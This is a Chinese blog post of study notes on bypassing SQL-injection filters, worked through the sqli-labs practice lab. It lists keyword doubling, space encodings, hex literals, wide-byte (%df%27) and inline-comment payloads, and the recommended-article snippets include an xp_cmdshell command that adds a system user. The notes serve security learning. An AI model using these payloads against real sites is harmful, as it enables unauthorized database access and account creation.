SQL注入de绕过

最新推荐文章于 2024-04-10 21:32:12 发布
最新推荐文章于 2024-04-10 21:32:12 发布
阅读量456 收藏 1
点赞数 1
分类专栏: web安全之sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44029504/article/details/105582891
版权

SQL注入绕过

基本思路

基本思路找到一种可替换的符号或者可替换的逻辑语句。

--------------------------------------------------------分隔符---------------------------------------------------

过滤关键字
1、and与or的过滤

1)替换

or---> ||
and--> &&

2)形变或者大小写

and -> anandd
and -> And/AND
Less25–and和or的过滤

在这里插入图片描述
1)判断闭合方式
如果判断错误(图2),则页面不变,如果判断成功,页面会报错(图1)
在这里插入图片描述
在这里插入图片描述
再进一步判断:页面会报错
http://192.168.168.135/sqli-labs-master/Less-25/?id=1‘ and 1=1 --+

注意:报错是因为后台存在防御机制

2)做绕过:and的绕过也有好几种,但是有些能成功,有些也被做了防御,所以需要进行试探

http://192.168.168.135/sqli-labs-master/Less-25/?id=1’ anandd 1=1 --+

--------------------------------------------------------分隔符---------------------------------------------------

2、空格的绕过

1)替换

%0a,%0b,%0c,%0d,%a0,%00,/**/,/*!*/,(),[]   都能起到隔开两个命令、语句的作用

Less26:空格的绕过、注释符

http://192.168.168.135/sqli-labs-master/Less-26/?id=1'and%0b'1'='1

--------------------------------------------------------分隔符---------------------------------------------------

3、引号绕过
hex编码
where schema_name='security'
where schema_name=0xyyyyyyy   //hex编码替换
where schema_name=database()  //函数替换

--------------------------------------------------------分隔符---------------------------------------------------

4、逗号绕过
select mid('abc',1,1);
select mid('abc' from 1 for 1);  //用from for替换
select 1,2;     select from 1 for 2;   //出错,逗号应该是逻辑上的替换
select 1;
=select * from (select 1)a
select 1,2,3;
=select * from (select 1)a join (select 2)b
select 1,2,3;
=select * from (select 1)a join (select 2)b join (select 3)c;

--------------------------------------------------------分隔符---------------------------------------------------

5、等号、大于号、小于号绕过
=    ---like
select id from users where username='admin';
=select id from users where username like 'admin';   //like替换等号

greatest和least
select hex(mid('abc',1,1))>1;
=select least(hex(mid('abc',1,1)),1)like1;
select 1 from users where username between 2 and 1;

--------------------------------------------------------分隔符---------------------------------------------------

6、等价函数
hex()---bin()、ascii()
sleep()---waitfor()、benchmark()
mid() ---substr()、substring()

--------------------------------------------------------分隔符---------------------------------------------------

7、宽字节注入–绕过单引号、双引号过滤
%7e  %7e%15
某个汉字=%df%27  %df=\  %27='

后台机制会给特殊字符添加转义字符来达到防御的目的’—>’,当你输入%5c%27,后台对%5c添加转义%df等于你输入的%5c%27组合数据就被添加为%df%5c%27,但是%df%5c是一个宽字节汉字,然后就会形成 縗%27 ->縗’

‘–>’ %5c%5c%5c%27 %df%5c%5c%5c%27 縗\’

select ‘1’’; 输出:1’
’ 语法含义的单引号,是一个闭合符
’ 字符串单引号
\’ 人为添加一个,将’转为一个闭合符
--------------------------------------------------------分隔符---------------------------------------------------

8、内联注释绕过

通过/!/ 包裹执行语句达到欺骗防御的目的

select 1,2 from users;
select username,password from users limit 0,1;
select username,password from users limit 0,1 /*!union*/ /*!all*/ /*!select*/ 1,2;  //如果过滤了union,使用内联注释包裹
sql注入过滤绕过实例
Sumarua的博客
06-19 1560
靶场 云演sql注入过滤绕过靶场 漏洞分析 1、漏洞点:index.php 我们可以看到,在第38行,通过 GET方式传入了id 值,然后会经过过滤,然后直接拼接到 SQL 语句中。 由下图可知,picture.php 通过 GET 方式接收 id值,接收的值会直接拼接到SQL语句中,存在SQL注入漏洞,但是有过滤,需要我们绕过。 2、分析过滤字符 $black = [’=’,‘union’,’/’,’/’,‘order’,‘load’,‘by’,‘group’,‘sleep’,‘update’,‘de
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
SQL注入绕过
西电卢本伟的博客
03-24 5453
文章目录什么是绕过注释符号绕过双写绕过大小写绕过空格绕过等号绕过内联注释绕过参数污染绕过宽字节注入 什么是绕过 个人理解是系统或者安全软件为了避免攻击者篡改一些参数来获取数据,就会自动过滤一些篡改信息的关键词。但系统和软件终究是人编写出来的,攻击者们还是有各种各样的方法绕过安全点的检测来达到自己的目的。 注释符号绕过 双写绕过 大小写绕过 空格绕过 等号绕过 内联注释绕过 参数污染绕过 宽字节注入 ...
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 2244
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
sql注入常见绕过方法
ljlrookiebird的博客
09-05 6304
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
Nginx中防止SQL注入攻击的相关配置介绍
09-30
黑客可能会使用更复杂的绕过方法。为了更全面地防止SQL注入,最佳实践是在应用程序层面进行输入验证和转义。例如,使用预编译的SQL语句、参数化查询或者使用安全的ORM框架。 此外,定期更新Nginx和Web应用程序的...
SQL注入渗透PostgreSQL(bypass tricks)
weixin_54787877的博客
03-13 3042
我们将研究Web应用程序防火墙的绕过方法,以及在不同的查询子句中泄漏数据的方法,例如SELECT,WHERE,ORDER BY,FROM等。 简要概述一下,PostgreSQL是: […] a free and open-source relational database management system emphasizing extensibility and technical standards compliance. It is designed to handle a range o..
php intval绕过 注入,PHP代码审计片段讲解(入门代码审计、CTF必备)
weixin_36290287的博客
04-12 1885
关于本项目代码审计对于很多安全圈的新人来说,一直是一件头疼的事情,也想跟着大牛们直接操刀审计CMS?却处处碰壁:函数看不懂!漏洞原理不知道!PHP特性更不知!那还怎么愉快审计?不如化繁为简,跟着本项目先搞懂PHP中大多敏感函数与各类特性,再逐渐增加难度,直到可以吊打各类CMS~本项目讲解基于多道CTF题,玩CTF的WEB狗也不要错过(^-^)V题的源码在Github: bowu (Github),...
SQL注入---字符绕过
最新发布
zhoutong2323的博客
04-10 2979
当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.and 和 or 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:符号被过滤 使用URL注入编码后 报错注入
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8623
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
SQL注入--绕过技巧
weixin_44940180的博客
07-31 5336
参考自 基本绕过方法 大小写 双写 编码,如URLEncode编码,ASCII编码绕过 内敛注释 空格绕过 用注释替换空格 select/**/user,password/**/from /**/users; 空格url编码%20 两个空格代替一个空格 用Tab代替空格 %a0=空格 如果空格被过滤,括号没有被过滤,可以用括号绕过 select(user())from dual where(1=1)and(2=2) 引号绕过 使用十六进制 例如: select column_name fro
SQL注入实战:绕过操作
ting_liang的博客
01-27 3289
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
SQL注入 引号转义绕过
Auroraxsn的博客
04-25 1万+
问题描述 做了一个靶场,注入点为数字类型,一开始一帆风顺,直到爆破列名的时候突然报错,页面突然就没了,毫无征兆...报错时的url如下: ?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name="users" 查看源码: $sql="SELECT * FROM users wher
sqlmap常用绕过脚本
L_lemo004的博客
10-20 1435
使用方法–tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=” bluec
SQL 注入绕过(二)
不秃头的程序Yang
06-27 956
1、第一种方式:substr 截取字符串
绕过 SQL 注入
白菜执笔人的博客
03-02 293
Web安全攻防 学习笔记 一、绕过 SQL 注入 1.1、绕过去除注释符的 SQL 注入         注释符用于标记某段代码的作用,起到对代码功能的说明作用,但是注释掉的内容不会被执行。 Mysql中的注释符: 单行注释: --+ 或 --空格 或 # 多行注释: /* 多行注释内容 */       &n...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值